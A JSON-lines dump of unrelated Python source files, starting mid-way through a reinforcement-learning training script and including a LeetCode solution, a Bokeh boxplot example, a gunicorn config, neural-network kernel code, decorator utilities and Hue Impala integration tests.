'BipedalWalkerHardcore-v2' max_ep_len is 2000\n parser.add_argument('--max_ep_len_train', type=int, default=1000) # max_ep_len_train < 2000//3 # 'BipedalWalkerHardcore-v2' max_ep_len is 2000\n parser.add_argument('--start_steps', type=int, default=100)\n parser.add_argument('--hid', type=int, default=300)\n parser.add_argument('--l', type=int, default=1)\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--lr', type=float, default=1e-3)\n parser.add_argument('--seed', '-s', type=int, default=np.random.random_integers(1000))\n parser.add_argument('--epochs', type=int, default=10000)\n parser.add_argument('--alpha', default='auto', help=\"alpha can be either 'auto' or float(e.g:0.2).\")\n parser.add_argument('--reward_scale', type=float, default=1.0)\n parser.add_argument('--act_noise', type=float, default=0.3)\n parser.add_argument('--obs_noise', type=float, default=0.0)\n parser.add_argument('--exp_name', type=str, default='sac1_LunarLanderContinuous-v2_debug3')\n parser.add_argument('--stack_frames', type=int, default=4)\n args = parser.parse_args()\n\n from spinup.utils.run_utils import setup_logger_kwargs\n logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)\n\n\n\n class Wrapper(object):\n\n def __init__(self, env, action_repeat):\n self._env = env\n self.action_repeat = action_repeat\n\n def __getattr__(self, name):\n return getattr(self._env, name)\n\n def step(self, action):\n r = 0.0\n for _ in range(self.action_repeat):\n obs_, reward_, done_, info_ = self._env.step(action)\n reward_ = reward_ if reward_ > -99.0 else 0.0\n r = r + reward_\n if done_:\n return obs_, r, done_, info_\n return obs_, r, done_, info_\n\n\n # env = FrameStack(env, args.stack_frames)\n\n env_lunar1 = gym.make(args.env)\n env_lunar3 = Wrapper(gym.make(args.env),3)\n\n\n sac1(args, lambda n : env_lunar3 if n==3 else env_lunar1, actor_critic=core.mlp_actor_critic,\n ac_kwargs=dict(hidden_sizes=[200,150]), start_steps = args.start_steps,\n gamma=args.gamma, seed=args.seed, epochs=args.epochs, alpha=args.alpha,\n logger_kwargs=logger_kwargs, lr = args.lr, reward_scale=args.reward_scale,\n max_ep_len_train = args.max_ep_len_train, max_ep_len_test=args.max_ep_len_test)\n\n\n"} {"ext": "py", "sha": "1a2ecc6bad59824fa1f6ac55ea8fd73202781d3d", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nhashing package.\n\"\"\"\n\nfrom pyrin.packaging.base import Package\n\n\nclass HashingPackage(Package):\n \"\"\"\n hashing package class.\n \"\"\"\n\n NAME = __name__\n DEPENDS = []\n COMPONENT_NAME = 'security.hashing.component'\n"} {"ext": "py", "sha": "1a2ecd7107a85cf463bbc690de50a35bcbc58805", "content": "\"\"\"1248. Count Number of Nice Subarrays\nMedium\"\"\"\n\nclass Solution(object):\n def numberOfSubarrays(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n #########\n m = [0]*50001\n res = 0\n curr = 0\n m[0] = 1\n for i in range(len(nums)):\n curr += (nums[i]%2)\n if curr >= k:\n res += m[curr-k]\n m[curr] += 1\n\n return res\n\n\n #######\n return self.atMost(nums, k)-self.atMost(nums, k-1)\n def atMost(self, nums, k):\n res = 0\n count = 0\n left = 0\n right = 0\n while right < len(nums):\n n = nums[right]\n count += n%2\n while count >= k:\n c = nums[left]\n count -= c%2\n left += 1\n res += right - left + 1\n right += 1\n return res\n#################\n def atMost(k):\n res = 0\n left = 0\n for right in range(len(nums)):\n k -= nums[right]%2\n while k < 0:\n k += nums[left]%2\n left += 1\n res += right -left + 1\n\n return res\n\n return atMost(k) - atMost(k-1)\n\n\n\n\n\n\n\n\n\n\n#\n"} {"ext": "py", "sha": "1a2ecd80be15ea48380f7886225f68a675e972bf", "content": "import numpy as np\nimport pandas as pd\n\nfrom bokeh.plotting import figure, output_file, show\n\n# generate some synthetic time series for six different categories\ncats = list(\"abcdef\")\nyy = np.random.randn(2000)\ng = np.random.choice(cats, 2000)\nfor i, l in enumerate(cats):\n yy[g == l] += i // 2\ndf = pd.DataFrame(dict(score=yy, group=g))\n\n# find the quartiles and IQR for each category\ngroups = df.groupby('group')\nq1 = groups.quantile(q=0.25)\nq2 = groups.quantile(q=0.5)\nq3 = groups.quantile(q=0.75)\niqr = q3 - q1\nupper = q3 + 1.5*iqr\nlower = q1 - 1.5*iqr\n\n# find the outliers for each category\ndef outliers(group):\n cat = group.name\n return group[(group.score > upper.loc[cat]['score']) | (group.score < lower.loc[cat]['score'])]['score']\nout = groups.apply(outliers).dropna()\n\n# prepare outlier data for plotting, we need coordinates for every outlier.\nif not out.empty:\n outx = []\n outy = []\n for keys in out.index:\n outx.append(keys[0])\n outy.append(out.loc[keys[0]].loc[keys[1]])\n\np = figure(tools=\"\", background_fill_color=\"#efefef\", x_range=cats, toolbar_location=None)\n\n# if no outliers, shrink lengths of stems to be no longer than the minimums or maximums\nqmin = groups.quantile(q=0.00)\nqmax = groups.quantile(q=1.00)\nupper.score = [min([x,y]) for (x,y) in zip(list(qmax.loc[:,'score']),upper.score)]\nlower.score = [max([x,y]) for (x,y) in zip(list(qmin.loc[:,'score']),lower.score)]\n\n# stems\np.segment(cats, upper.score, cats, q3.score, line_color=\"black\")\np.segment(cats, lower.score, cats, q1.score, line_color=\"black\")\n\n# boxes\np.vbar(cats, 0.7, q2.score, q3.score, fill_color=\"#E08E79\", line_color=\"black\")\np.vbar(cats, 0.7, q1.score, q2.score, fill_color=\"#3B8686\", line_color=\"black\")\n\n# whiskers (almost-0 height rects simpler than segments)\np.rect(cats, lower.score, 0.2, 0.01, line_color=\"black\")\np.rect(cats, upper.score, 0.2, 0.01, line_color=\"black\")\n\n# outliers\nif not out.empty:\n p.circle(outx, outy, size=6, color=\"#F38630\", fill_alpha=0.6)\n\np.xgrid.grid_line_color = None\np.ygrid.grid_line_color = \"white\"\np.grid.grid_line_width = 2\np.xaxis.major_label_text_font_size=\"16px\"\n\noutput_file(\"boxplot.html\", title=\"boxplot.py example\")\n\nshow(p)\n"} {"ext": "py", "sha": "1a2ecd9f1d6d31168200762d078ed37afef0b3f4", "content": "#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n\n__created__ = '4/22/16'\n__author__ = 'deling.ma'\n\"\"\"\nimport multiprocessing\n\nbind = '0.0.0.0:7777'\nmax_requests = 10000\nkeepalive = 5\n\nproc_name = 'fitahol'\n\nworkers = multiprocessing.cpu_count() * 2 + 1\nworker_class = 'gaiohttp'\n\nloglevel = 'info'\nerrorlog = '-'\n\nx_forwarded_for_header = 'X-FORWARDED-FOR'\n"} {"ext": "py", "sha": "1a2ece63ba632d7fd8e3f9695efe9d0224cde988", "content": "import numpy as np\nimport tensorflow as tf\nimport tensorflow.compat.v1.keras as keras\nimport pickle\nimport os\nfrom math import ceil\n\nfrom utils import preprocess_flags, save_kernel, save_kernel_partial\nfrom utils import load_data,load_model,load_model_json,load_kernel\nfrom utils import data_folder,kernel_folder,arch_folder\n\ndef main(_):\n\n FLAGS = tf.compat.v1.app.flags.FLAGS.flag_values_dict()\n FLAGS = preprocess_flags(FLAGS)\n globals().update(FLAGS)\n\n if init_dist != \"gaussian\":\n raise NotImplementedError(\"Initialization distributions other than Gaussian are not implemented for computing kernels!\")\n\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n print(rank)\n\n if n_gpus>0:\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=str((rank)%n_gpus)\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n\n set_session = keras.backend.set_session\n config.log_device_placement = False # to log device placement (on which device the operation ran)\n config.allow_soft_placement = True # so that it uses any other existing and supported devices, if the requested GPU:0 isn't found\n sess = tf.compat.v1.Session(config=config)\n set_session(sess) # set this TensorFlow session as the default session for Keras\n\n train_images,flat_train_images,_,test_images,_ = load_data(FLAGS)\n image_size = train_images.shape[1]\n number_channels = train_images.shape[-1]\n #print(\"image_size\", image_size)\n X = train_images\n flat_X = flat_train_images\n if compute_for_GP_train:\n test_images = test_images[:1000]\n data = test_images\n tp_order = np.concatenate([[0,len(data.shape)-1], np.arange(1, len(data.shape)-1)])\n print(data.shape,tp_order)\n flat_data = np.transpose(data, tp_order) # NHWC -> NCHW # this is because the cnn GP kernels assume this\n flat_test_images = np.array([test_image.flatten() for test_image in flat_data])\n Xfull = np.concatenate([flat_train_images,flat_test_images])\n flat_X = Xfull\n X = np.concatenate([train_images,test_images])\n\n print(\"compute kernel\", network, dataset)\n\n # COMPUTE KERNEL\n if use_empirical_NTK:\n from nngp_kernel.empirical_ntk import empirical_NTK\n print(ceil(int(X.shape[0])*n_samples_repeats))\n from tensorflow.keras.models import model_from_json\n model = load_model(FLAGS)\n K = empirical_NTK(model,X)#,sess=sess)\n elif use_empirical_K:\n from nngp_kernel.empirical_kernel import empirical_K\n print(\"n_samples_repeats\",n_samples_repeats)\n print(ceil(int(X.shape[0])*n_samples_repeats))\n arch_json_string = load_model_json(FLAGS)\n K = empirical_K(arch_json_string,X,ceil(int(X.shape[0])*n_samples_repeats),sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus,empirical_kernel_batch_size=empirical_kernel_batch_size, sess=sess, truncated_init_dist=truncated_init_dist,data_parallelism=False,store_partial_kernel=store_partial_kernel,partial_kernel_n_proc=partial_kernel_n_proc,partial_kernel_index=partial_kernel_index)\n if rank == 0:\n if not (use_empirical_K or use_empirical_NTK):\n if network==\"cnn\":\n from nngp_kernel.cnn_kernel import kernel_matrix\n K = kernel_matrix(flat_X,image_size=image_size,number_channels=number_channels,filter_sizes=filter_sizes,padding=padding,strides=strides,sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus)\n\n elif network==\"resnet\":\n from nngp_kernel.resnet_kernel import kernel_matrix\n K = kernel_matrix(flat_X,depth=number_layers,image_size=image_size,number_channels=number_channels,n_blocks=3,sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus)\n\n elif network == \"fc\":\n from nngp_kernel.fc_kernel import kernel_matrix\n K = kernel_matrix(flat_X,number_layers=number_layers,sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus)\n\n print(K)\n\n '''SAVE KERNEL'''\n if store_partial_kernel:\n save_kernel_partial(K,FLAGS,partial_kernel_index) \n else:\n save_kernel(K,FLAGS)\n\n\nif __name__ == '__main__':\n\n f = tf.compat.v1.app.flags\n\n from utils import define_default_flags\n\n define_default_flags(f)\n f.DEFINE_boolean('compute_for_GP_train', False, \"Whether to add a bit of test set to kernel, to be able to use it for GP training\")\n f.DEFINE_boolean('store_partial_kernel', False, \"Whether to store the kernels partially on a file to free the processes\")\n f.DEFINE_integer('empirical_kernel_batch_size', 256, \"batch size to use when computing the empirical kernel, larger models need smaller values, but smaller models can use larger values\")\n f.DEFINE_integer('partial_kernel_n_proc', 175, \"number of processes over which we are parallelizing the when computing partial kernels and saving\")\n f.DEFINE_integer('partial_kernel_index', 0, \"index of the process when using partial_kernels method\")\n\n tf.compat.v1.app.run()\n"} {"ext": "py", "sha": "1a2eceda5f4aee7b68d75c4aa2f4346d9be6b522", "content": "\"\"\"\nThis namespace holds Inference decorators.\n\"\"\"\nfrom .inference import Inference\n\n\n# --------------------------------------------------------------------------\ndef get(label):\n \"\"\"\n This is an inference decorator which can be used to decorate\n a getter method.\n\n ..code-block:: python\n \n >>> import recollection\n >>>\n >>> class Foo(recollection.Inference):\n ... \n ... def __init__(self):\n ... super(Foo, self).__init__()\n ... \n ... # -- Demonstrate a private attribute with getter\n ... # -- and setter methods\n ... self._letter = 1\n ... \n ... # -- Declare that this is a memento getter\n ... @recollection.infer.get('foobar')\n ... def get_letter(self):\n ... return self._letter\n\n :param label: You must specify a label to be used when storing\n this variable. For the registration to be processed there \n must be a correlating setter defined on the class with the same\n label.\n :type label: str\n\n :return: \n \"\"\"\n def inner_decor(func):\n def inner(*args, **kwargs):\n return func(*args, **kwargs)\n\n # -- Assign our attributes\n inner.label = label\n inner.is_memento_getter = True\n inner.is_memento_setter = False\n\n return inner\n\n return inner_decor\n\n\n# --------------------------------------------------------------------------\ndef store(label, copy_value=True, serialise=False):\n \"\"\"\n This is an inference decorator which can be used to decorate\n a getter method.\n\n ..code-block:: python\n \n >>> import recollection\n >>> \n >>> class Foo(recollection.Inference):\n ... \n ... def __init__(self):\n ... super(Foo, self).__init__()\n ... \n ... # -- Demonstrate a private attribute with getter\n ... # -- and setter methods\n ... self._letter = 1\n ... \n ... # -- Declare that this is a memento getter\n ... @recollection.infer.store('letter', serialise=True)\n ... def set_letter(self):\n ... return self._letter\n >>> foo = Foo()\n \n :param label: You must specify a label to be used when storing\n this variable. For the registration to be processed there \n must be a correlating setter defined on the class with the same\n label.\n :type label: str\n\n :param copy_value: Default is True, this defines whether the object\n being stored will be copied or referenced. Typically if this is\n likely to be left to True, however if you want a reference to an \n object to be stored in history rather than copies of the object you\n should set this to False.\n :type copy_value: bool\n\n :param serialise: If true this will perform a serialisation of the \n memento object each time the setter is called. This expects a\n serialiser to be registered. The default is False.\n :type serialise: bool\n\n :return: \n \"\"\"\n\n def inner_decor(func):\n def inner(*args, **kwargs):\n result = func(*args, **kwargs)\n\n # -- Now store\n if isinstance(args[0], Inference):\n args[0].memento.store(serialise=serialise)\n\n return result\n\n # -- Assign our attributes\n inner.label = label\n inner.is_memento_getter = False\n inner.is_memento_setter = True\n inner.copy_value = copy_value\n\n return inner\n\n return inner_decor\n"} {"ext": "py", "sha": "1a2ed04be8d0202c2b5d6919530f398ef3156a94", "content": "#!/usr/bin/env python\n# Licensed to Cloudera, Inc. under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. Cloudera, Inc. licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport re\n\nfrom nose.plugins.skip import SkipTest\nfrom nose.tools import assert_true, assert_equal, assert_false\n\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nimport desktop.conf as desktop_conf\nfrom desktop.lib.django_test_util import make_logged_in_client\nfrom desktop.lib.test_utils import add_to_group\nfrom desktop.models import Document\nfrom hadoop.pseudo_hdfs4 import get_db_prefix, is_live_cluster\n\nfrom beeswax import data_export\nfrom beeswax.design import hql_query\n\nfrom beeswax.data_export import download\nfrom beeswax.models import SavedQuery, QueryHistory\nfrom beeswax.server import dbms\nfrom beeswax.test_base import get_query_server_config, wait_for_query_to_finish, fetch_query_result_data\nfrom beeswax.tests import _make_query\n\nfrom impala import conf\nfrom impala.dbms import ImpalaDbms\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass MockDbms:\n\n def get_databases(self):\n return ['db1', 'db2']\n\n def get_tables(self, database):\n return ['table1', 'table2']\n\n\nclass TestMockedImpala:\n\n def setUp(self):\n self.client = make_logged_in_client()\n\n # Mock DB calls as we don't need the real ones\n self.prev_dbms = dbms.get\n dbms.get = lambda a, b: MockDbms()\n\n def tearDown(self):\n # Remove monkey patching\n dbms.get = self.prev_dbms\n\n def test_basic_flow(self):\n response = self.client.get(\"/impala/\")\n assert_true(re.search('Impala', response.content), response.content)\n assert_true('Query Editor' in response.content)\n\n response = self.client.get(\"/impala/execute/\")\n assert_true('Query Editor' in response.content)\n\n def test_saved_queries(self):\n user = User.objects.get(username='test')\n\n response = self.client.get(\"/impala/list_designs\")\n assert_equal(len(response.context[0]['page'].object_list), 0)\n\n try:\n beewax_query = create_saved_query('beeswax', user)\n response = self.client.get(\"/impala/list_designs\")\n assert_equal(len(response.context[0]['page'].object_list), 0)\n\n impala_query = create_saved_query('impala', user)\n response = self.client.get(\"/impala/list_designs\")\n assert_equal(len(response.context[0]['page'].object_list), 1)\n\n # Test my query page\n QueryHistory.objects.create(owner=user, design=impala_query, query='', last_state=QueryHistory.STATE.available.value)\n\n resp = self.client.get('/impala/my_queries')\n assert_equal(len(resp.context[0]['q_page'].object_list), 1)\n assert_equal(resp.context[0]['h_page'].object_list[0].design.name, 'create_saved_query')\n finally:\n if beewax_query is not None:\n beewax_query.delete()\n if impala_query is not None:\n impala_query.delete()\n\n\nclass TestImpalaIntegration:\n\n @classmethod\n def setup_class(cls):\n cls.finish = []\n\n if not is_live_cluster():\n raise SkipTest\n\n cls.client = make_logged_in_client()\n cls.user = User.objects.get(username='test')\n add_to_group('test')\n cls.db = dbms.get(cls.user, get_query_server_config(name='impala'))\n cls.DATABASE = get_db_prefix(name='impala')\n\n queries = [\"\"\"\n DROP TABLE IF EXISTS %(db)s.tweets;\n \"\"\" % {'db': cls.DATABASE}, \"\"\"\n DROP DATABASE IF EXISTS %(db)s CASCADE;\n \"\"\" % {'db': cls.DATABASE}, \"\"\"\n CREATE DATABASE %(db)s;\n \"\"\" % {'db': cls.DATABASE}]\n\n for query in queries:\n resp = _make_query(cls.client, query, database='default', local=False, server_name='impala')\n resp = wait_for_query_to_finish(cls.client, resp, max=180.0)\n content = json.loads(resp.content)\n assert_true(content['status'] == 0, resp.content)\n\n queries = [\"\"\"\n CREATE TABLE tweets (row_num INTEGER, id_str STRING, text STRING) STORED AS PARQUET;\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (1, \"531091827395682000\", \"My dad looks younger than costa\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (2, \"531091827781550000\", \"There is a thin line between your partner being vengeful and you reaping the consequences of your bad actions towards your partner.\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (3, \"531091827768979000\", \"@Mustang_Sally83 and they need to get into you :))))\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (4, \"531091827114668000\", \"@RachelZJohnson thank you rach!xxx\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (5, \"531091827949309000\", \"i think @WWERollins was robbed of the IC title match this week on RAW also i wonder if he will get a rematch i hope so @WWE\");\n \"\"\"]\n\n for query in queries:\n resp = _make_query(cls.client, query, database=cls.DATABASE, local=False, server_name='impala')\n resp = wait_for_query_to_finish(cls.client, resp, max=180.0)\n content = json.loads(resp.content)\n assert_true(content['status'] == 0, resp.content)\n\n\n @classmethod\n def teardown_class(cls):\n # We need to drop tables before dropping the database\n queries = [\"\"\"\n DROP TABLE IF EXISTS %(db)s.tweets;\n \"\"\" % {'db': cls.DATABASE}, \"\"\"\n DROP DATABASE %(db)s CASCADE;\n \"\"\" % {'db': cls.DATABASE}]\n for query in queries:\n resp = _make_query(cls.client, query, database='default', local=False, server_name='impala')\n resp = wait_for_query_to_finish(cls.client, resp, max=180.0)\n\n # Check the cleanup\n databases = cls.db.get_databases()\n assert_false(cls.DATABASE in databases)\n assert_false('%(db)s_other' % {'db': cls.DATABASE} in databases)\n\n for f in cls.finish:\n f()\n\n\n def test_basic_flow(self):\n dbs = self.db.get_databases()\n assert_true('_impala_builtins' in dbs, dbs)\n assert_true(self.DATABASE in dbs, dbs)\n\n tables = self.db.get_tables(database=self.DATABASE)\n assert_true('tweets' in tables, tables)\n\n QUERY = \"\"\"\n SELECT * FROM tweets ORDER BY row_num;\n \"\"\"\n response = _make_query(self.client, QUERY, database=self.DATABASE, local=False, server_name='impala')\n content = json.loads(response.content)\n query_history = QueryHistory.get(content['id'])\n\n response = wait_for_query_to_finish(self.client, response, max=180.0)\n\n results = []\n\n # Check that we multiple fetches get all the result set\n while len(results) < 5:\n content = fetch_query_result_data(self.client, response, n=len(results), server_name='impala') # We get less than 5 results most of the time, so increase offset\n results += content['results']\n\n assert_equal([1, 2, 3, 4, 5], [col[0] for col in results])\n\n # Check start over\n results_start_over = []\n\n while len(results_start_over) < 5:\n content = fetch_query_result_data(self.client, response, n=len(results_start_over), server_name='impala')\n results_start_over += content['results']\n\n assert_equal(results_start_over, results)\n\n # Check cancel query\n resp = self.client.post(reverse('impala:api_cancel_query', kwargs={'query_history_id': query_history.id}))\n content = json.loads(resp.content)\n assert_equal(0, content['status'])\n\n\n def test_data_download(self):\n hql = 'SELECT * FROM tweets %(limit)s'\n\n FETCH_SIZE = data_export.FETCH_SIZE\n data_export.FETCH_SIZE = 2 # Decrease fetch size to validate last fetch logic\n\n try:\n query = hql_query(hql % {'limit': ''})\n\n handle = self.db.execute_and_wait(query)\n # Get the result in csv. Should have 5 + 1 header row.\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 5 + 1)\n\n\n query = hql_query(hql % {'limit': 'LIMIT 0'})\n\n handle = self.db.execute_and_wait(query)\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 1)\n\n query = hql_query(hql % {'limit': 'LIMIT 1'})\n\n handle = self.db.execute_and_wait(query)\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 1 + 1)\n\n query = hql_query(hql % {'limit': 'LIMIT 2'})\n\n handle = self.db.execute_and_wait(query)\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 1 + 2)\n finally:\n data_export.FETCH_SIZE = FETCH_SIZE\n\n\n def test_explain(self):\n QUERY = \"\"\"\n SELECT * FROM tweets ORDER BY row_num;\n \"\"\"\n response = _make_query(self.client, QUERY, database=self.DATABASE, local=False, server_name='impala', submission_type='Explain')\n json_response = json.loads(response.content)\n assert_true('MERGING-EXCHANGE' in json_response['explanation'], json_response)\n assert_true('SCAN HDFS' in json_response['explanation'], json_response)\n\n\n def test_get_table_sample(self):\n client = make_logged_in_client()\n\n resp = client.get(reverse('impala:get_sample_data', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_equal([u'row_num', u'id_str', u'text'], data['headers'], data)\n assert_true(len(data['rows']), data)\n\n\n def test_get_session(self):\n session = None\n try:\n # Create open session\n session = self.db.open_session(self.user)\n\n resp = self.client.get(reverse(\"impala:api_get_session\"))\n data = json.loads(resp.content)\n assert_true('properties' in data)\n assert_true(data['properties'].get('http_addr'))\n assert_true('session' in data, data)\n assert_true('id' in data['session'], data['session'])\n finally:\n if session is not None:\n try:\n self.db.close_session(session)\n except Exception:\n pass\n\n\n def test_get_settings(self):\n resp = self.client.get(reverse(\"impala:get_settings\"))\n json_resp = json.loads(resp.content)\n assert_equal(0, json_resp['status'])\n assert_true('QUERY_TIMEOUT_S' in json_resp['settings'])\n\n\n def test_invalidate_tables(self):\n # Helper function to get Impala and Beeswax (HMS) tables\n def get_impala_beeswax_tables():\n impala_resp = self.client.get(reverse('impala:api_autocomplete_tables', kwargs={'database': self.DATABASE}))\n impala_tables_meta = json.loads(impala_resp.content)['tables_meta']\n impala_tables = [table['name'] for table in impala_tables_meta]\n beeswax_resp = self.client.get(reverse('beeswax:api_autocomplete_tables', kwargs={'database': self.DATABASE}))\n beeswax_tables_meta = json.loads(beeswax_resp.content)['tables_meta']\n beeswax_tables = [table['name'] for table in beeswax_tables_meta]\n return impala_tables, beeswax_tables\n\n impala_tables, beeswax_tables = get_impala_beeswax_tables()\n assert_equal(impala_tables, beeswax_tables,\n \"\\ntest_invalidate_tables: `%s`\\nImpala Tables: %s\\nBeeswax Tables: %s\" % (self.DATABASE, ','.join(impala_tables), ','.join(beeswax_tables)))\n\n hql = \"\"\"\n CREATE TABLE new_table (a INT);\n \"\"\"\n resp = _make_query(self.client, hql, wait=True, local=False, max=180.0, database=self.DATABASE)\n\n impala_tables, beeswax_tables = get_impala_beeswax_tables()\n # New table is not found by Impala\n assert_true('new_table' in beeswax_tables, beeswax_tables)\n assert_false('new_table' in impala_tables, impala_tables)\n\n resp = self.client.post(reverse('impala:invalidate'), {'database': self.DATABASE})\n\n impala_tables, beeswax_tables = get_impala_beeswax_tables()\n # Invalidate picks up new table\n assert_equal(impala_tables, beeswax_tables,\n \"\\ntest_invalidate_tables: `%s`\\nImpala Tables: %s\\nBeeswax Tables: %s\" % (self.DATABASE, ','.join(impala_tables), ','.join(beeswax_tables)))\n\n\n def test_refresh_table(self):\n # Helper function to get Impala and Beeswax (HMS) columns\n def get_impala_beeswax_columns():\n impala_resp = self.client.get(reverse('impala:api_autocomplete_columns', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n impala_columns = json.loads(impala_resp.content)['columns']\n beeswax_resp = self.client.get(reverse('beeswax:api_autocomplete_columns', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n beeswax_columns = json.loads(beeswax_resp.content)['columns']\n return impala_columns, beeswax_columns\n\n impala_columns, beeswax_columns = get_impala_beeswax_columns()\n assert_equal(impala_columns, beeswax_columns,\n \"\\ntest_refresh_table: `%s`.`%s`\\nImpala Columns: %s\\nBeeswax Columns: %s\" % (self.DATABASE, 'tweets', ','.join(impala_columns), ','.join(beeswax_columns)))\n\n hql = \"\"\"\n ALTER TABLE tweets ADD COLUMNS (new_column INT);\n \"\"\"\n resp = _make_query(self.client, hql, wait=True, local=False, max=180.0, database=self.DATABASE)\n\n impala_columns, beeswax_columns = get_impala_beeswax_columns()\n # New column is not found by Impala\n assert_true('new_column' in beeswax_columns, beeswax_columns)\n assert_false('new_column' in impala_columns, impala_columns)\n\n resp = self.client.post(reverse('impala:refresh_table', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n\n impala_columns, beeswax_columns = get_impala_beeswax_columns()\n # Invalidate picks up new column\n assert_equal(impala_columns, beeswax_columns,\n \"\\ntest_refresh_table: `%s`.`%s`\\nImpala Columns: %s\\nBeeswax Columns: %s\" % (self.DATABASE, 'tweets', ','.join(impala_columns), ','.join(beeswax_columns)))\n\n\n def test_get_exec_summary(self):\n query = \"\"\"\n SELECT COUNT(1) FROM tweets;\n \"\"\"\n\n response = _make_query(self.client, query, database=self.DATABASE, local=False, server_name='impala')\n content = json.loads(response.content)\n query_history = QueryHistory.get(content['id'])\n\n wait_for_query_to_finish(self.client, response, max=180.0)\n\n resp = self.client.post(reverse('impala:get_exec_summary', kwargs={'query_history_id': query_history.id}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_true('nodes' in data['summary'], data)\n assert_true(len(data['summary']['nodes']) > 0, data['summary']['nodes'])\n\n # Attempt to call get_exec_summary on a closed query\n resp = self.client.post(reverse('impala:get_exec_summary', kwargs={'query_history_id': query_history.id}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_true('nodes' in data['summary'], data)\n assert_true(len(data['summary']['nodes']) > 0, data['summary']['nodes'])\n\n\n def test_get_runtime_profile(self):\n query = \"\"\"\n SELECT COUNT(1) FROM tweets;\n \"\"\"\n\n response = _make_query(self.client, query, database=self.DATABASE, local=False, server_name='impala')\n content = json.loads(response.content)\n query_history = QueryHistory.get(content['id'])\n\n wait_for_query_to_finish(self.client, response, max=180.0)\n\n resp = self.client.post(reverse('impala:get_runtime_profile', kwargs={'query_history_id': query_history.id}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_true('Execution Profile' in data['profile'], data)\n\n\n# Could be refactored with SavedQuery.create_empty()\ndef create_saved_query(app_name, owner):\n query_type = SavedQuery.TYPES_MAPPING[app_name]\n design = SavedQuery(owner=owner, type=query_type)\n design.name = 'create_saved_query'\n design.desc = ''\n design.data = hql_query('show $tables', database='db1').dumps()\n design.is_auto = False\n design.save()\n\n Document.objects.link(design, owner=design.owner, extra=design.type, name=design.name, description=design.desc)\n\n return design\n\n\ndef test_ssl_cacerts():\n for desktop_kwargs, conf_kwargs, expected in [\n ({'present': False}, {'present': False}, ''),\n ({'present': False}, {'data': 'local-cacerts.pem'}, 'local-cacerts.pem'),\n\n ({'data': 'global-cacerts.pem'}, {'present': False}, 'global-cacerts.pem'),\n ({'data': 'global-cacerts.pem'}, {'data': 'local-cacerts.pem'}, 'local-cacerts.pem'),\n ]:\n resets = [\n desktop_conf.SSL_CACERTS.set_for_testing(**desktop_kwargs),\n conf.SSL.CACERTS.set_for_testing(**conf_kwargs),\n ]\n\n try:\n assert_equal(conf.SSL.CACERTS.get(), expected,\n 'desktop:%s conf:%s expected:%s got:%s' % (desktop_kwargs, conf_kwargs, expected, conf.SSL.CACERTS.get()))\n finally:\n for reset in resets:\n reset()\n\n\ndef test_ssl_validate():\n for desktop_kwargs, conf_kwargs, expected in [\n ({'present': False}, {'present': False}, True),\n ({'present': False}, {'data': False}, False),\n ({'present': False}, {'data': True}, True),\n\n ({'data': False}, {'present': False}, False),\n ({'data': False}, {'data': False}, False),\n ({'data': False}, {'data': True}, True),\n\n ({'data': True}, {'present': False}, True),\n ({'data': True}, {'data': False}, False),\n ({'data': True}, {'data': True}, True),\n ]:\n resets = [\n desktop_conf.SSL_VALIDATE.set_for_testing(**desktop_kwargs),\n conf.SSL.VALIDATE.set_for_testing(**conf_kwargs),\n ]\n\n try:\n assert_equal(conf.SSL.VALIDATE.get(), expected,\n 'desktop:%s conf:%s expected:%s got:%s' % (desktop_kwargs, conf_kwargs, expected, conf.SSL.VALIDATE.get()))\n finally:\n for reset in resets:\n reset()\n\n\nclass TestImpalaDbms():\n\n def test_get_impala_nested_select(self):\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'id', None), ('id', '`default`.`customers`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'email_preferences', 'categories/promos/'),\n ('email_preferences.categories.promos', '`default`.`customers`'))\n 